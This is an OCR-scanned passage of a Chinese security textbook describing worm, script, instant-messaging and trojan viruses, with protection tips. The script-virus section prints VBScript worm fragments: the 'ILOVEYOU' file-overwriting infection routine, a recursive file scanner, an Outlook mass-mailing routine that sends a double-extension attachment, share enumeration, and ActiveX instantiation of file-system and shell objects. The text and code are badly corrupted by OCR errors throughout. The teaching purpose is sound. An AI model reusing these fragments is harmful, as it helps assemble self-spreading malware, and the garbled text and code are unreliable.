可 怕 的 是 ， 这 样 的 病毒 是 以 源 代码 的 形式 出 现 的 ， 只 要 懂得 一 点 关于 脚本 编程 的 人 就 可 以 
修改 其 代码 ， 形 成 各 种 各 样 的 变种 。 

4) “个 人 用 户 对 蠕虫 病毒 的 防范 措施 

通过 上 述 的 分 析 ， 我 们 可 以 知道 ， 病 毒 并 不 是 非常 可 怕 的 ， 网 络 蠕虫 病毒 对 个 人 用 户 
的 攻击 主要 还 是 通过 社会 工程 学 ， 而 不 是 利用 系统 漏洞 。 所 以 防范 此 类 病毒 需要 注意 以 下 
几 点 。 

(1) 安装 合适 的 杀毒 软件 。 网 络 蠕虫 病毒 的 发 展 已 经 使 传统 的 杀毒 软件 的 “文件 级 实 
时 监控 系统 ”落伍 ， 杀 毒 软件 必须 向 内 存 实时 监控 和 邮件 实时 监控 发 展 。 另 外 ， 面 对 防 不 
胜 防 的 网 页 病毒 ， 也 使 得 用 户 对 杀毒 软件 的 要 求 越 来 越 高 。 在 杀毒 软件 市 场 上 ， 赛 门 铁 克 
公司 的 Norton 系列 杀毒 软件 在 全 球 具有 很 大 的 比例 ， 经 过 多 项 测试 ，Norton 杀毒 系列 软件 
脚本 和 蠕虫 阻拦 技术 能 够 阻挡 大 部 分 电子 邮件 病毒 ， 而 且 对 网 页 病毒 也 具有 相当 强 的 防范 
能 力 。 目 前 国内 的 杀毒 软件 也 具有 相当 高 的 水 平 ， 像 瑞星 ，KV 系列 等 杀毒 软件 ， 在 杀毒 
的 同时 整合 了 防火 墙 功能 ， 从 而 对 蠕虫 兼 木马 程序 有 很 大 抵制 作用 。 

(2) 经 常 升级 病毒 库 。 杀 毒 软件 对 病毒 的 查 杀 是 以 病毒 的 特征 码 为 依据 的 ， 而 病毒 每 
天 都 层出不穷 ， 尤 其 是 在 网 络 时 代 ， 里 虫 病毒 的 传播 速度 快 ， 变 种 多 ， 所 以 必须 随时 更 新 
病毒 库 ， 以 便 能 够 查 杀 最 新 的 病毒 。 

(3) 提高 预防 、 杀 毒 意识 。 不 要 轻易 去 点 击 陌生 的 站 点 ， 有 可 能 里 面 就 含有 恶意 代码 。 

当 运 行 正 时 ， 依 次 选择 “工具 ”|“Intemet 选项 ”|“ 安 全 ”|“Internet 区 域 的 安全 级 
别 ”， 把 安全 级 别 由 “中 ” 改 为 “高 ”。 因 为 这 一 类 网 页 主要 是 含有 恶意 代码 的 ActiveX 
或 Applet、JavaScript 的 网 页 文件 ， 所 以 在 正 设置 中 将 ActiveX 插件 和 控件 、Java 脚本 等 
全 部 禁止 就 可 以 大 大 减少 被 网 页 恶意 代码 感染 的 几率 。 具 体 方案 是 : 在 正 窗口 中 选择 “ 工 
上 共 ”|“Intemet 选项 ”， 在 弹出 的 对 话 框 中 切换 到 “安全 ”选项 卡 ， 再 单 击 “ 自 定义 级 别 ” 
按钮 ， 就 会 弹出 “安全 设置 ”对 话 框 ， 把 其 中 所 有 ActiveX 插件 和 控件 以 及 与 Java 相关 选 
项 全 部 选择 “禁用 ”。 但 是 ， 这 样 做 在 以 后 的 网 页 浏览 过 程 中 有 可 能 会 无 法 浏览 一 些 正常 
应 用 ActiveX 的 网 站 。 

(4) 不 随意 查看 陌生 邮件 ， 尤 其 是 带 有 附件 的 邮件 。 由 于 有 的 病毒 邮件 能 够 利用 正 和 
Outlook 的 漏洞 自动 执行 ， 所 以 计算 机 用 户 需要 升级 正 和 Outlook 程序 ， 及 常用 的 其 他 应 
用 程序 。 


4.2.2 网 页 脚本 病毒 
1. 脚本 病毒 的 定义 
脚本 病毒 是 指 利用 .asp、.htm、.html、.vbs、.js 类 型 的 文件 进行 传播 的 基于 VB Script 
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和 Java Script 脚本 语言 并 由 Windows Scripting Host 解释 执行 的 一 类 病毒 。 

脚本 语言 的 功能 非常 强大 ， 它 们 利用 Windows 系统 具有 开发 性 的 特点 ， 通 过 调用 一 些 
现成 的 Windows 对 象 和 组 件 ， 可 以 直接 对 文件 系统 、 注 册 表 等 进行 控制 。 脚 本 病毒 正 是 利 
用 脚本 语言 的 这 个 特点 ， 通 过 ActiveX 进行 网 页 传播 或 者 通过 OE 的 自动 发 送 邮件 功能 进 
行 传播 。 

脚本 病毒 通常 与 网 页 相 结合 ， 将 恶意 的 破坏 性 代码 内 嵌 在 网 页 中 ， 一 旦 用 户 浏览 带 毒 
网 页 ， 病 毒 就 会 发 作 。 轻 则 修改 用 户 注册 表 、 更 改 默认 主页 或 强迫 用 户 访问 某 站 点 ， 重 则 
格式 化 用 户 硬盘 ， 造 成 重大 的 数据 损失 。 


2. 脚本 病毒 的 特点 


由 于 网 页 文件 是 由 脚本 语言 组 成 的 纯 文 本 文件 ， 这 种 文件 没有 固定 的 结构 ， 操 作 系统 
在 运行 这 些 程序 文件 的 时 候 只 是 单纯 地 从 文件 的 第 一 行 开始 运行 ， 直 至 运行 到 文件 的 最 后 
- 行 ， 因 此 病毒 感染 这 些 程序 文件 的 时 候 就 省 去 了 复杂 的 文件 结构 判断 和 地 址 计算 ， 使 病 
毒 的 感染 更 加 人 简单。 并且 由 于 Windows 不 断 提高 脚本 语言 的 功能 ， 使 这 些 容易 编写 的 脚本 
语言 能 够 实现 越 来 越 复 杂 和 更 强大 的 功能 ， 因 此 针对 脚本 文件 感染 的 病毒 也 越 来 越 具有 破 
坏 性 。 

综合 来 讲 ， 脚 本 病毒 具有 如 下 特点 。 

(1) 编写 简单 。 一 个 以 前 对 病毒 一 无 所 知 的 病毒 爱好 者 可 以 在 很 短 的 时 间 里 编 出 一 个 
新 型 病毒 来 。 

(2) 破坏 力 大 。 其 破坏 力 不 仅 表现 在 对 用 户 系统 文件 及 系统 性 能 的 破坏 ， 还 可 以 使 邮 
件 服务 器 崩 演 ， 网 络 发 生 严重 阻塞。 

(3) 感染 力 强 。 由 于 脚本 是 直接 解释 执行 的 ， 并 且 它 不 需要 像 PE 病毒 那样 ， 需 要 做 
复杂 的 PE 文件 格式 处 理 ， 因 此 这 类 病毒 可 以 直接 通过 自我 复制 的 方式 感染 其 他 文件 ， 并 
且 自 我 的 异常 处 理 非常 容易 。 

(4) 传播 范围 大 。 这 类 病毒 通过 htm 文档 、E-mail 附件 或 其 他 方式 ， 可 以 在 很 短 时 间 
内 传 遍 世 界 各 地 。 

(5) 病毒 源码 容易 被 获取 , 变种 多 。 由 于 VBS 病毒 解释 执行 , 其 源 代码 可 读 性 非常 强 ， 
即使 病毒 源码 经 过 加 密 处 理 ， 其 源 代码 的 获取 还 是 比较 简单 。 因 此 ， 这 类 病毒 变种 比较 多 ， 
稍微 改变 一 下 病毒 的 结构 ， 或 者 修改 一 下 特征 值 ， 很 多 杀毒 软件 可 能 就 无 能 为 力 了 。 

(6) 欺骗 性 强 。 以 我 们 的 传统 认识 ， 我 们 只 要 不 从 互联 网 上 下 载 应 用 程序 ， 那 么 感染 
病毒 的 几率 就 会 大 大 降低 。 脚 本 病毒 的 出 现 彻底 改变 了 人 们 的 这 种 看 法 。 一 些 看 似 平淡 无 
奇 的 网 站 或 许 隐藏 着 巨大 的 危机 。 一 不 小 心 ， 用 户 就 会 在 浏览 网 页 的 同时 “中 招 ”， 造 成 
无 尽 的 有 麻烦。 此外， 隐藏 在 电子 邮件 里 的 脚本 病毒 往往 具有 双 扩 展 名 并 以 此 来 迷惑 用 户 。 
有 的 文件 看 似 是 一 个 JPG 图 片 ， 其 实 真 正 的 扩展 名 是 VBS 脚本 。 

(7) 病毒 生产 机 实现 起 来 非常 容易 。 所 谓 病毒 生产 机 ， 就 是 可 以 按照 用 户 的 意愿 ， 生 
产 病 毒 的 计算 机 (当然 ， 这 里 指 的 是 程序 )。 
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3. VBS 脚本 病毒 原理 分 析 


1) VBS 脚本 病毒 如 何 感染 、 搜 索 文件 
VBS 脚本 病毒 一 般 是 直接 通过 自我 复制 来 感染 文件 的 ， 病 毒 中 的 绝 大 部 分 代码 都 可 以 
直接 附加 在 其 他 同类 程序 中 。 璧 如 “新 欢乐 时 光 ” 病 毒 可 以 将 自己 的 代码 附加 在 :htm 文件 
的 尾部 ， 并 在 项 部 加 入 一 条 调用 病毒 代码 的 语句 ， 而 “ 爱 虫 ”病毒 则 是 直接 生成 一 个 文件 
的 副本 ， 将 病毒 代码 复制 到 其 中 ， 并 以 原文 件 名 作为 病毒 文件 名 的 前 级 ，.vbs 作为 后 级 。 
下 面 我 们 通过 “ 爱 虫 ”病毒 的 部 分 代码 具体 分 析 一 下 这 类 病毒 的 感染 和 搜索 原理 。 
以 下 是 文件 感染 的 部 分 关键 代码 。 
set fso=createobject ("scripting.filesystemobject") “创建 一 个 文件 系统 对 象 
set self=fso.opentextfile(wscript.scriptfullname,1) ' 读 打开 当前 文件 ( 即 
病毒 本 身 ) 
vbscopy=self.readall ， 读 取 病 毒 全 部 代码 到 字符 串 变 量 vbscopy..… 
set ap=fso.opentextfile (目标 文件 .path,2,true) ' 写 打开 目标 文件 ， 准 备 写 入 病 
毒 代码 


ap.write vbscopy ”将 病毒 代码 覆盖 目标 文件 

ap.close 

set cop=fso.getfile (目标 文件 .path) ' 得 到 目标 文件 路 径 

cop.copy (目标 文件 .path & ".vbs") ”创建 另外 一 个 病毒 文件 (以 .vbs 为 后 级 ) 
目标 文件 .delete (true) "删除 目标 文件 


上 面 描述 了 病毒 文件 是 如 何 感染 正常 文件 的 : 首先 将 病毒 自身 代码 赋 给 字符 串 变 量 
Vbscopy， 然 后 将 这 个 字符 串 覆盖 写 到 目标 文件 ， 并 创建 一 个 以 目标 文件 名 为 文件 名 前 
级 、.vbs 为 后 级 的 文件 副本 ， 最 后 删除 目标 文件 。 

下 面 我 们 具体 分 析 一 下 文件 搜索 代码 。 

' 该 函数 主要 用 来 寻找 满足 条 件 的 文件 ， 并 生成 对 应 文件 的 一 个 病毒 副本 

sub scan(folder ) "scan 函数 定义 ， 
on error resume next "如 果 出 现 错误 ， 直 接 跳 过 ， 防 止 弹出 错误 窗口 
set folder =fso.getfolder(folder_ ) 
set files=folder .files "当前 目录 的 所 有 文件 集合 
for each file in filesext=fso.GetExtensionName (file) ' 获 取 文件 后 级 
ext=lcase (ext) " 后缀 名 转换 成 小 写字 母 
if ext="mp5"” then “' 如 果 后 缀 名 是 mp5， 则 进行 感染 。 请 自己 建立 相应 后 级 名 的 
文件 ， 最 好 是 非 正常 后 级 名 ， 以 免 破坏 正常 程序 
Wscript.echo (file) 
end if 
next 
set subfolders=folder_ .subfolders 
for each subfolder in subfolders "搜索 其 他 目录 ， 递归 调用 
Scan( ) 
scan(subfolder) 
next 
end sub 


上 面 的 代码 就 是 VBS 脚本 病毒 进行 文件 搜索 的 代码 分 析 。 搜索 部 分 scan( ) 函 数 做 得 短 
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小 精 悍 ， 非 常 巧妙 ， 采 用 了 一 个 递归 算法 遍历 整个 分 区 的 目录 和 文件 。 

2) VBS 脚本 病毒 通过 网 络 传播 的 几 种 方式 及 代码 分 析 

VBS 脚本 病毒 之 所 以 传播 范围 广 ， 主 要 依赖 于 它 的 网 络 传播 功能 。 一 般 来 说 ，VBS 脚 
本 病毒 采用 以 下 几 种 方式 进行 传播 。 

(1) 通过 E-mail 附件 传播 。 

这 是 一 种 用 得 非常 普遍 的 传播 方式 ， 病 毒 可 以 通过 各 种 方法 取得 合法 的 E-mail 地 址 ， 
最 常见 的 就 是 直接 取 Outlook 地 址 筹 中 的 邮件 地 址 ， 也 可 以 通过 程序 在 用 户 文 档 (譬如 htm 
文件 ) 中 搜索 E-mail 地 址 。 

下 面 我 们 具体 分 析 一 下 VBS 脚本 病毒 是 如 何 做 到 这 一 点 的 。 


Function mailBroadcast () 
on error resume next 
wscript .echo 
Set outlookApp = CreateObject ("Outlook.Application") ' 创 建 一 个 Outlook 
应 用 的 对 象 
If outlookApp= "Outlook" Then 
Set mapiobj=outlookapp .GetNameSpace ("MAPI")  ' 获 取 MAPI 的 名 字 空 间 
Set addrList= mapiObj.AddressLists "获取 地 址 表 的 个 数 
For Each addr In addrList 
If addr.AddressEntries.Count <> 0 Then 
addrEntCount = addr.AddressEntries.Count ' 获 取 每 个 地 址 表 的 E-mail 记录 数 
For addrEntIndex= 1 To addrEntCount ' 遍 历 地 址 表 的 E-mail 地 址 
Set item = outlookApp.CreateItem(0) "获取 一 个 邮件 对 象 实例 
Set addrEnt = addr.AddressEntries (addrEntIndex) ' 获 取 具 体 E-mail 地 址 
item.To = addrEnt.Rddress " 填 入 收 信人 地 址 
item.Subject = "病毒 传播 实验 " ' 写 入 邮件 标题 
item.Body = "这 里 是 病毒 邮件 传播 测试 ， 收 到 此 信 请 不 要 慌张 ! " ' 写 入 文件 内 容 
Set attachMents=item.Attachments “定义 邮件 附件 
attachMents.Add fileSysobj .GetSpecialFolder(0) & "\test.jpg.vbs" 


item.DeleteRfterSubmit = True "信件 提交 后 自动 删除 
IE item.To <> "" Then 
item.Send "发 送 邮件 


shell0bj .regwrite "HKCU\software\Mailtest\mailed"，"1" ' 病 毒 标记 , 以 
免 重 复 感染 
End If 
Next 
End If 
Next 
End if 
End Function 


(2) 通过 局 域 网 共享 传播 。 
通过 局 域 网 共享 传播 也 是 一 种 非常 普遍 并 且 有 效 的 网 络 传播 方式 。 一 般 来 说 ， 为 了 局 
域 网 内 交流 方便 , 存在 不 少 共享 目录 , 并 且 具 有 可 写 权限 , 譬如 Windows 2000 创建 共享 时 ， 
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默认 就 是 具有 可 写 权限 。 病 毒 通过 搜索 这 些 共享 目录 ， 就 可 以 将 病毒 代码 传播 到 这 些 目 录 
之 中 。 


在 VBS 中 ,， 有 一 个 对 象 可 以 实现 网 上 邻居 共享 文件 夹 的 搜索 与 文件 操作 。 病 毒 利用 该 


对 象 就 可 以 达到 传播 的 目的 。 


welcome _ msg = "网 络 连接 搜索 测试 " 

Set WSHNetwork = WScript.CreateObject ("WScript.Network") "创建 一 个 网 络 对 象 
Set oPrinters = WshNetwork.EnumPrinterConnections “创建 一 个 网 络 打印 机 连接 列 
表 


WScript.Echo "Network printer mappings:" 


For i = 0 to oPrinters.Count - 1 Step 2 "显示 网 络 打印 机 连接 情况 
WScript.Echo "Port " & oPrinters.Item(i) & " = " & oPrinters.Item(i+l) 
Next 


Set colDrives = WSHNetwork.EnumNetworkDrives ' 创 建 一 个 网 络 共享 连接 列表 
If colDrives.Count = 0 Then 

MsgBox "没有 可 列 出 的 驱动 器 。"， vbInformation + vbOkOnly,welcome msg 
Else 

strMsg = "当前 网 络 驱动 器 连接 : " & CRLF 


For i = 0 To colDrives.Count - 1 Step 2 


strMsg = strMsg & Chr(13) & Chr (10) & colDrives(i) & Chr (9) & colDrives( 
业 - 寺 到 

Next 

MsgBox strMsg，vbInformation + vbOkOnly，welcome_msg' 显 示 当 前 网 络 驱 动 器 连 


End If 


上 面 是 一 个 用 来 寻找 当前 打印 机 连接 和 网 络 共享 连接 并 将 它们 显示 出 来 的 完整 脚本 程 


序 。 在 知道 了 共享 连接 之 后 ， 脚 本 病毒 就 可 以 直接 向 目标 驱动 器 读 写 文件 了 。 


(3) 通过 感染 hm、asp、jsp、php 等 网 页 文件 传播 。 
如 今 ，WWW 服务 已 经 非常 普遍 ， 病 毒 通过 感染 htm 等 文件 ， 势 必 会 导致 所 有 访问 过 


该 网 页 的 用 户 计算 机 感染 病毒 。 


病毒 之 所 以 能 够 在 htm 文件 中 发 挥 强大 破坏 功能 ， 是 因为 采用 了 和 绝 大 部 分 网 页 恶意 


代码 相同 的 原理 。 基 本 上 ， 它 们 采用 了 相同 的 代码 ， 不 过 也 可 以 采用 其 他 代码 ， 这 些 代码 
是 病毒 FSO、WSH 等 对 象 能 够 在 网 页 中 运行 的 关键 。 在 注册 表 HKEY_CLASSES_ 
ROOT\CLSID\ 下 可 以 找到 这 么 一 个 主键 {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}， 

注册 表 中 对 它 的 说 明 是 “Windows Script Host Shell Object ”， 同 样 ， 也 可 以 找到 
{0D43FE01-F093-11C F-8940-00A0C9054228}, 注册 表 对 它 的 说 明 是 “File System Object”， 


- 般 先 要 对 COM 进行 初始 化 ， 在 获取 相应 的 组 件 对 象 之 后 ， 病 毒 便 可 正确 地 使 用 FSO、 


WSH 两 个 对 象 ， 调 用 它们 的 强大 功能 。 代 码 如 下 所 示 。 


Set AppleObject = document.applets ("KJ_guest") 
AppleObject .setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 
AppleObject .createInstance () "创建 一 个 实例 
Set WsShell Appleobject.Getobject () 
AppleObject .setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") 
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AppleObject .createInstance () "创建 一 个 实例 
Set FSO = AppleObject.GetObject () 


对 于 其 他 类 型 的 文件 ， 这 里 不 再 一 一 分 析 。 

4. 防范 脚本 病毒 的 安全 建议 

为 了 免 受 脚本 病毒 的 攻击 ， 提 出 以 下 安全 建议 。 

(1) 养 成 良好 的 上 网 习惯 ， 不 浏览 不 熟悉 的 网 站 ， 尤 其 是 一 些 个 人 主页 和 色情 网 站 
从 根本 上 减少 被 病毒 侵害 的 机 会 。 

(2) 选择 安装 适合 自身 情况 的 主流 厂商 的 杀毒 软件 ， 安 装 个 人 防火 墙 ， 在 上 网 前 打开 
“实时 监控 功能 ”， 尤 其 要 打开 “网 页 监控 ”和 “注册 表 监 控 ” 两 项 功能 。 

(3) 将 正常 的 注册 表 进 行 备份 ， 或 者 下 载 注册 表 修复 程序 ， 一 旦 出 现 异常 情况 ， 马 上 
进行 相应 的 修复 。 

(4) 如 果 发 现 不 良 网 站 ， 立 刻 向 有 关 部 门 报告 ， 同 时 将 网 站 添加 到 “ 黑 名 单 ” 中 ， 如 
图 4-1 所 示 。 


EC 
请 为 不 同 区 域 的 Yeb 内 容 指定 安全 设置 区) 
ee 


@ re 该 区 域 中 的 所 有 网 站 都 具 


将 该 网 站 添加 到 区 域 中 @) 


网 站 加: 


图 4-1 将 不 良 网 站 添加 到 “ 黑 名单 ” 中 
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(5) 提高 正 等 浏览 器 的 安全 级 别 。 将 正 的 安全 级 别 设置 为 “高 ”， 如 图 4-2 所 示 。 


设置 G@): 
图 hctivex 控件 和 插件 Ey 
图 hctivex 控件 自动 提示 
禁用 


局 用 
图 对 标记 为 可 安全 执行 脚本 的 ActiveX 控件 执行 脚 < 
禁用 


图 4-2 将 IE 的 安全 级 别 设置 为 “高 ” 


4.2.3 即时 通讯 病毒 
1. 即时 通讯 病毒 的 特点 及 分 类 


即时 通讯 (IM) 类 病毒 主要 是 指 通 过 即时 通讯 软件 (如 MSN、QQ 等 ) 向 用 户 的 联系 人 自 
动 发 送 恶意 消息 或 自身 文件 来 达到 传播 目的 的 病毒 。 

IM 类 病毒 通常 有 两 种 工作 模式 : 一 种 是 自动 发 送 恶意 文本 消息 ,这些 消息 一 般 都 包含 

-个 或 多 个 网 址 ， 指 向 恶意 网 页 ， 收 到 消息 的 用 户 一 旦 打开 了 恶意 网 页 就 会 从 恶意 网 站 上 

自动 下 载 并 运行 病毒 程序 ， 另 一 种 是 利用 即时 通讯 软件 的 传送 文件 功能 ， 将 自身 文件 直接 
发 送出 去 ， 这 也 是 时 下 流行 的 主 模式 。 

第 一 个 利用 MSN 传播 的 蠕虫 是 2001 年 4 月 被 发 现 的 IWorm/Funny， 第 一 个 利用 QQ 
自动 发 送 恶意 消息 的 病毒 是 2002 年 8 月 份 的 “爱情 森林 ”。 近 年 来 ， 各 种 即时 通讯 软件 层 
出 不 穷 ， 在 线 用 户 的 人 数 也 呈 爆 炸 式 增长 。 据 英国 知名 IT 站 点 vnunet 消息 ， 防 病毒 公司 
F-Secure 称 ， 他 们 已 经 检测 到 200 种 通过 IM 传播 的 蠕虫 ， 另 外 还 有 700 多 种 特洛伊 木马 、 
后 门 和 密码 窃取 程序 。 据 权威 调研 机 构 IDC 此 前 预计 ， 到 2008 年 ， 全 球 IM 用 户 数量 将 达 
5.06 亿 ， 这 无 疑 给 企业 IT 部 门 带 来 新 的 忧虑 。 可 以 说 ， 随 着 IM 的 日 益 发 展 并 逐渐 普及 到 
企业 市 场 ， 其 安全 风险 也 将 是 史无前例 的 。 

即时 通讯 病毒 主要 具有 以 下 三 个 特点 。 

1) “更 强 的 隐蔽 性 

传统 的 病毒 (例如 蠕虫 类 病毒 ) 通 过 扫描 、 电 子 邮 件 传播 和 文件 共享 找到 感染 的 宿主 机 
器 ， 在 寻找 宿主 计算 机 时 造成 了 大 量 的 额外 流量 ， 而 突如其来 的 网 络 流量 足以 使 一 些 互 联 
网 服务 提供 商 陷 于 瘫痪 ， 因 此 相对 而 言 这 种 病毒 容易 被 及 时 发 现 。 

即时 通讯 类 病毒 攻击 时 通常 不 会 造成 网 络 堵塞 ， 用 户 即 便 是 受到 攻击 也 不 会 明显 地 感 
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觉 到 计算 机 网 络 流量 的 改变 。 当 IM 病毒 攻击 并 感染 用 户 计算 机 时 ， 会 立即 搜寻 该 用 户 的 
好 友 列 表 ， 寻 找 在 线 用 户 ， 获 得 新 的 感染 对 象 ， 并 向 该 对 象 发 送 新 的 请 求 或 含有 病毒 代码 
的 数据 包 。 而 对 方 接收 到 “好 友 ” 发 送 过 来 的 信息 时 ， 往 往 会 不 假 思 索 的 接受 ， 从 而 很 快 
受到 病毒 的 感染 。IM 病毒 利用 人 们 心理 上 的 疏忽 达到 更 好 的 隐蔽 性 ， 从 而 得 以 迅速 传播 。 

2) ”攻击 更 加 便利 

黑客 或 病毒 往往 利用 IM 软件 的 一 些 基础 功能 ， 比 如 传送 没有 经 过 加 密 的 资料 、 绕 开 
企业 防火 墙 、 内 建 联络 人 清单 等 ， 迅 速 而 有 效 地 进行 攻击 和 传播 。 为 了 便于 通信 ， 大 多 数 
即时 通讯 软件 都 可 以 绕 过 防火 墙 ， 允 许 用 户 选择 使 用 的 端口 ， 甚 至 会 自动 尝试 连接 未 封 住 
的 端口 。 

3) ”更 快 的 传播 速度 

美国 反 病毒 公司 赛 门 铁 克 (Symantec) 的 两 名 研究 人 员 埃 里 克 。 基 恩 (EricChien) 和 尼 
尔 。 辛 都 查 (NealHindocha) 对 IM 病毒 的 传播 速度 进行 了 相关 研究 。 他 们 对 用 户 通 过 即时 通 
讯 软件 发 送信 息 所 需 的 时 间 进 行 了 测定 ， 再 加 上 对 平均 每 个 用 户 在 即时 通讯 软件 “好 友 名 
录 ” 中 设 定 的 用 户 数量 进行 计算 ， 算 出 了 IM 病毒 传播 的 平均 速度 。 基 恩 表示 : “我 们 做 
了 大 量 的 模拟 试验 ， 平 均 结 果 是 IM 病毒 在 30 秒 内 能 传播 到 50 万 台 计算 机 上 。?” 一 种 传 
播 速 度 极 快 的 IM 病毒 将 可 以 利用 一 种 软件 漏洞 突破 计算 机 的 安全 防御 系统 ， 然 后 执行 一 
些 非 授 权 命令 。 

目前 ， 攻 击 即时 通讯 软件 的 病毒 主要 分 为 三 类 : 第 一 类 是 只 以 QQ、MSN 等 即时 通讯 
软件 为 传播 渠道 的 病毒 ， 如 “MSN 机 器 人 ”、“QQ 尾巴 ”等 ; 第 二 类 是 专门 针对 即时 通 
讯 软件 本 身 的 窃取 用 户 帐 号 、 密 码 的 病毒 ， 如 针对 QQ、MSN 等 的 盗号 木马 ; 第 三 类 是 不 
断 给 用 户 发 消息 的 骚扰 型 病毒 ， 如 “MSN 骗子 (Worm.msn.funny)” 等 。 

2. 防范 即时 通讯 病毒 的 安全 建议 

IM 病毒 的 预防 及 处 理 方法 如 下 。 

(1) 尽量 不 要 在 公共 场合 使 用 IM 软件 ， 例 如 ， 不 安全 的 网 吧 等 场所 。 一 些 管理 不 规 
范 的 网 吧 防 护 措施 不 严密 ， 临 时 软件 不 能 定时 清理 ， 留 有 很 多 安全 隐患 ， 用 户 上 网 时 的 一 
些 个 人 信息 、 密 码 等 很 容易 被 泄露 。 

(2) 随时 注意 微软 公司 官方 的 安全 公告 ， 及 时 下 载 更 新 系统 漏洞 补丁 ， 不 给 病毒 制造 
者 以 可 乘 之 机 。 

(3) 养 成 良好 的 上 网 习惯 ， 时 刻 提高 警惕 。 发 现 有 人 发 来 莫名 其 妙 的 文件 ， 收 到 文件 
后 一 定 要 向 对 方 进行 确认 。 如 果 对 方 没有 发 过 文件 ， 那 么 这 个 文件 很 有 可 能 是 对 方 计算 机 
中 病毒 发 送 的 ， 应 该 将 其 立即 删除 。 如 果 收 到 一 些 类 似 “ 某 某 网 页 上 有 如 何如 何 的 内 容 ， 
赶快 去 看 ”之 类 的 消息 时 ， 千 万 不 要 立刻 点 击 网 址 ， 这 种 消息 大 部 分 是 病毒 发 送 的 。 

(4) 制定 适合 公司 环境 的 内 部 信息 交换 规范 ， 严 格 管理 并 实时 监测 内 部 员工 IM 软件 
的 使 用 情况 。 

(5) 关闭 或 删除 系统 中 不 需要 的 服务 。 如 FTP 客户 端 、Telnet 及 Web 服务 等 。 

(6) 建议 使 用 8 位 以 上 的 复杂 密码 。“MSN 烤 鸡 ”病毒 可 以 迅速 破解 系统 的 弱 口 令 。 

(7) 当 发 现 病毒 或 异常 时 应 立刻 断 网 ， 以 防止 计算 机 受到 更 多 的 感染 ， 或 者 成 为 传播 
源 ， 感 染 其 他 计算 机 。 
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(8) 使 用 最 新 版 本 的 主流 信息 安全 产品 ， 提 高 系统 安全 级 别 。 


4.2.4 ”木马 病毒 
1. 木马 病毒 的 定义 


木马 ， 也 称 特洛伊 木马 ， 名 称 来 源 于 古 希 腊 的 神话 故事 。 传 说 希腊 人 围攻 特洛伊 城 ， 
久久 不 能 得 手 ， 后 来 想 出 了 一 个 木马 计 ， 让 士兵 藏匿 于 巨大 的 木马 中 。 大 部 队 假装 撤退 而 
将 木马 按 弃 于 特洛伊 城下 ， 让 敌人 将 其 作为 战利品 拖 入 城内 。 木 马 内 的 士兵 则 乘 夜 晚 政 人 
庆祝 胜利 、 放 松 警 惕 的 时 候 从 木马 中 怜 出来， 与 城 外 的 部 队 里 应 外 合 而 攻 下 了 特洛伊 城 。 

而 计算 机 世界 的 特洛伊 木马 (Trojan) 病 毒 (也 叫 黑客 程序 或 后 面 病毒 ) 是 指 隐藏 在 正常 程 
序 中 的 一 段 具有 特殊 功能 的 恶意 代码 ， 具 备 破坏 和 删除 文件 、 发 送 密码 、 记 录 键 盘 和 攻击 
等 功能 ， 会 使 用 户 系统 被 破坏 甚至 瘫痪 。 恶 意 的 木马 程序 具备 计算 机 病毒 的 特征 ， 目 前 很 
多 木马 程序 为 了 在 更 大 范围 内 传播 ， 而 与 计算 机 病毒 相 结合 。 因 此 ， 木 马 程序 也 可 以 看 作 
是 一 种 伪装 潜伏 的 网 络 病毒 。 

2. 木马 病毒 的 工作 原理 

木马 病毒 一 般 分 为 客户 端 (Client) 和 服务 器 端 (Server) 两 部 分 。 对 于 木马 病毒 而 言 ，“ 服 
务 器 端 ” 和 “客户 端 ” 的 概念 与 我 们 平常 理解 的 有 所 不 同 。 在 一 般 的 网 络 环境 中 ，“ 服 务 
器 ”往往 是 网 络 的 核心 ， 我 们 可 以 通过 服务 器 对 “客户 端 ” 进 行 访问 和 控制 ， 决 定 是 否 实 
施 网 络 服务 。 而 木马 病毒 则 恰恰 相反 ， 客 户 端 是 控制 端 ， 扮 演 着 “服务 器 ”的 角色 ， 是 使 
用 各 种 命令 的 控制 台 ， 而 服务 器 端 是 被 控制 端 。 木 马 病毒 的 制造 者 可 以 通过 网 络 中 的 其 他 
计算 机 任意 控制 服务 器 端的 计算 机 ， 并 享有 服务 器 端的 大 部 分 操作 权限 ， 利 用 控制 端 向 服 
务 器 端 发 出 请 求 ， 服 务 器 端 收 到 请 求 后 会 根据 请 求 执行 相应 的 操作 ， 其 中 包括 : 

。 ”查看 文件 系统 ， 修 改 、 删 除 、 获 取 文件 ; 

。 ”查看 系统 注册 表 ， 修 改 系统 配置 ; 

。 ”截取 计算 机 的 屏 蒂 显示 ， 并 且 发 送 给 控制 端 ; 

。 ”查看 系统 中 的 进程 ， 启 动 和 停止 进程 ; 

。 ”控制 计算 机 的 键盘 、 鼠 标 或 其 他 硬件 设备 的 动作 ; 

. 
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以 本 机 为 跳板 ， 攻 击 网 络 中 的 其 他 计算 机 ; 
通过 网 络 下 载 新 的 病毒 文件 。 
一 般 情况 下 ， 木 马 在 运行 后 ， 都 会 修改 系统 ， 以 便 在 下 一 次 系统 启动 时 自动 运行 该 木 
马 程 序 。 修 改 系统 的 方法 有 下 面 几 种 。 
@ ”利用 autoexec.bat 和 config.sys 进行 加 载 ; 
bg 修改 注册 表 ; 
e 修改 win.ini 文件 ; 
。 感染 Windows 系统 文件 ， 以 便 进行 自动 启动 并 达到 自动 隐藏 的 目的 。 


TTT EPE 


3. 木马 病毒 的 危害 及 特点 


木马 病毒 的 危害 在 于 它 对 系统 具有 强大 的 控制 和 破坏 能 力 。 功 能 强大 的 木马 一 旦 被 植 
入 用 户 的 计算 机 ， 木 马 的 制造 者 就 可 以 像 操作 自己 的 计算 机 一 样 控 制服 务 端 计算 机 ， 甚 至 
可 以 远程 监控 用 户 的 所 有 操作 。 在 每 年 爆发 的 众多 网 络 安全 事件 中 ， 大 部 分 网 络 入 侵 都 是 
通过 木马 病毒 进行 的 。 金 山 公司 推出 的 《2007 中 国电 脑病 毒 疫情 及 互联 网 安全 报告 》 给 出 
了 2007 年 最 危险 的 病毒 排名 ， 其 中 前 三 位 都 是 木马 ， 即 网 络 盗号 木马 、AUTO 病毒 (木马 
下 载 器 )、 灰 铅 子 。 

木马 病毒 的 特点 如 下 。 

1) “隐蔽 性 

木马 病毒 之 所 以 会 造成 很 大 损失 ， 其 根本 原因 就 是 其 隐蔽 性 非常 强 。 隐 蔽 性 也 是 病毒 
的 最 大 特点 。 

2) ”自动 运行 性 

